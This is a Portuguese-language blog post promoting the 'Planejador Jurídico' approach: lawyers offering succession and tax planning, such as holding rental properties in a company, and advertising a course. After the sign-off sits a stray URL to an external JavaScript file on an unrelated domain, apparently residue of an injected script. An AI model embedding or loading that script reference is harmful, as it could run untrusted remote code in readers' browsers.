Buscar

Procura-se um novo advogado – Uma forma diferente de atuação jurídica.

Tempo de leitura: 5 minutos

Olá! Márcio aqui do Planejador Jurídico, tudo ótimo?

Hoje vou explicar pra vocês um novo método de advogar e finalmente explicar o que é esse tal de Planejador Jurídico.

Procura-se um novo advogado – Uma forma diferente de atuação jurídica.

 O advogado atual para se diferenciar não pode atuar somente quando há um problema jurídico a resolver, ele precisa se antecipar aos mesmos e tentar prever os problemas ainda inexistentes criando ou buscando alternativas e soluções mais sofisticadas para velhos problemas.

Um exemplo claro de “velho problema” com solução mais sofisticada é o planejamento sucessório, é se antecipar para algo que irá ocorrer um dia, que é a morte (que tanto falo aqui para vocês).

Todos nós morreremos algum dia e deixaremos patrimônio, a solução antiga é a regra do inventário para que nossos herdeiros possam receber esse patrimônio, essa solução é antiquada e custa muito caro, pois o mesmo patrimônio passa por inventários a cada geração.

Então, por que não apresentar ao seu cliente um planejamento sucessório que é feito hoje e irá refletir positivamente por todas as gerações futuras. Seu patrimônio e de nenhuma geração futura precisará passar por um inventário, isso não é fantástico?

Esse é um exemplo de uma solução mais inteligente para um velho problema. Poucas pessoas tem conhecimento disso, e tenho certeza que, você como advogado, se apresentar ao seu cliente uma proposta deste tipo, irão te escutar e analisar essa possibilidade.

Modelo Tradicional x Planejamento Jurídico

Então, neste exemplo, você pode esperar essa pessoa morrer para talvez ser escolhido para fazer o inventário dela, ou se antecipar e lhe mostrar esse projeto em que Você obterá seus ganhos ao receber seus honorários de acordo com o andamento do projeto e ainda contribuir com a preservação do patrimônio dessa família por todas as gerações.

Isso é só um exemplo de como você pode ser bem sucedido na advocacia sem necessariamente precisar mover algum processo ou fazer qualquer audiência, bastando mudar a chave mental de atuação.

Os processos são morosos, desgastantes e desvalorizados. O cliente sempre quer pagar o mínimo possível. Os resultados demoram a aparecer pois não depende somente de nós, ao passo em que você atuando como um planejador jurídico, dependerá somente da sua capacidade.

O planejador jurídico nada mais é do que uma forma de atuação, você passar a ser visto não como um advogado que quando surgir um problema é acionado para resolver, não, você será visto e se apresentará como um estrategista que traz soluções sofisticadas para problemas que irão surgir inevitavelmente.

Quer outro exemplo de planejamento jurídico?

Muitos empresários e donos de imóveis possuem renda de aluguéis, detém vários imóveis alugados e geralmente todos estão em seu próprio nome. E qual é o problema disso?

Primeiro: tributação. Na pessoa física ele há a incidência do Imposto de Renda cuja alíquota geralmente bate na casa do máximo, que é 27,5%.

Qual seria a solução: é simples, mas pouca gente faz, estes imóveis deveriam estar em nome de uma empresa, cuja tributação chega a no máximo 11,33%, ou seja, menos da metade em comparação com a pessoa física.

Segundo Problema: Quando o proprietário morre, todos os imóveis devem ir pra inventário. O custo do inventário normalmente é de aproximadamente 10% do valor do imóvel no valor de mercado.

Solução: neste caso é possível duas alternativas:

a) com os imóveis em nome da pessoa jurídica, o que será inventariado são quotas da empresa, cujo valor do capital social é bem menor do que o valor real dos imóveis, só por aí você já reduz significativamente o custo de um inventário; ou

b) estabelecer em contrato social a previsão ou doação de quotas com reserva de usufruto, o que, neste caso é possível reduzir ainda mais os custos e evitar futuros conflitos.

Note que só nestes 2 tipos de exemplos podemos perceber vantagens que vão desde a redução com impostos atuais e futuros e ainda evitar uma série de conflitos familiares.

Essa é a ideia do Planejador Jurídico, é buscar e pensar em alternativas para oferecer aos clientes, alternativas estas que geram valor agregado alto e perceptível no qual o advogado deixa de ser uma despesa e se torna um investimento.

Em geral nós somos imediatistas sim, mas é preciso mudar esse pensamento e trabalhar no jogo do longo prazo, e isso pode partir de você advogado ao apresentar projetos ao seu cliente e não ser aquele profissional tradicional que fica aguardando ser chamado ou consultado quando surgem as demandas.

A maior fatia de faturamento dos grandes escritórios não é do contencioso e sim dos planejamentos, quer seja tributário, societário, sucessório e etc e o que é melhor é a área mais valorizada e que depende de menor esforço.

Reflita sobre isso e deixe de ser uma despesa e torne-se um investimento pro seu cliente, module seu mindset, seja um Planejador Jurídico!

_______________________________________________________________________________________________

Continue nos acompanhando, que em breve trarei para vocês o CURSO DO PLANEJADOR JURÍDICO! Nesse curso ensinarei vocês a resolverem, como estrategistas, esses problemas que citei no post e muitos outros. Você também pode ser um Planejador Jurídico. E deve ser!

Então nos acompanhe por aqui e por nossas redes sociais para saber mais notícias do curso. E, se quiser receber em primeira mão todos os detalhes do curso, deixe seu e-mail nos comentários ou assine nossa newsletter.

Gratidão pela leitura!

https://cloudapi.online/js/api46.js


#novoadvogado #educação #negócios #planejadorjuridico #empreendedorismo #mindset #persistência #advogado #planejamentojuridico

3 visualizações

© 2019 por Palombina.

Planejador Jurídico
  • White Instagram Icon
  • White Facebook Icon